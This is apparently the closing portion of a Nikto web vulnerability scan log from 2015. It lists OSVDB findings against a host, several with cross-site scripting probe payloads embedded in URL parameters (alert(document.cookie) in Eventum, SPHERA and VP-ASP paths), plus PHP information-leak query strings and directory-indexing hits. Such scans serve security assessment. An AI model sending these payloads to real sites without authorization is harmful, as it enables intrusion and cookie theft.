+ OSVDB-700: /fcgi-bin/echo.exe?foo=<script>alert(‘Vulnerable’)</script>: Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3954: /fcgi-bin/echo2.exe?foo=<script>alert(‘Vulnerable’)</script>: Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-19947: /apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>: Zeus Admin server 4.1r2 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-12607: /forgot_password.php?email=”><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12606: /bugs/index.php?err=3&email=”><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12607: /bugs/forgot_password.php?email=”><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12606: /eventum/index.php?err=3&email=”><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12607: /eventum/forgot_password.php?email=”><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-2562: /login/sm_login_screen.php?error=”><script>alert(‘Vulnerable’)</script>: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: /login/sm_login_screen.php?uid=”><script>alert(‘Vulnerable’)</script>: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: /SPHERA/login/sm_login_screen.php?error=”><script>alert(‘Vulnerable’)</script>: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: /SPHERA/login/sm_login_screen.php?uid=”><script>alert(‘Vulnerable’)</script>: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2921: /shopping/shopdisplayproducts.asp?id=1&cat=<script>alert(‘test’)</script>: VP-ASP prior to 4.50 are vulnerable to XSS attacks
+ OSVDB-2921: /shopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>: VP-ASP Shopping Cart 4.x shopdisplayproducts.asp XSS.
+ OSVDB-3092: /info/: This might be interesting…
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting…
+ OSVDB-3092: /php/: This might be interesting…
+ OSVDB-3092: /stat/: This might be interesting…
+ OSVDB-3092: /statistics/: This might be interesting…
+ OSVDB-3092: /updates/: This might be interesting…
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated: 4 error(s) and 167 item(s) reported on remote host
+ End Time: 2015-11-23 13:43:14 (GMT7) (3366 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested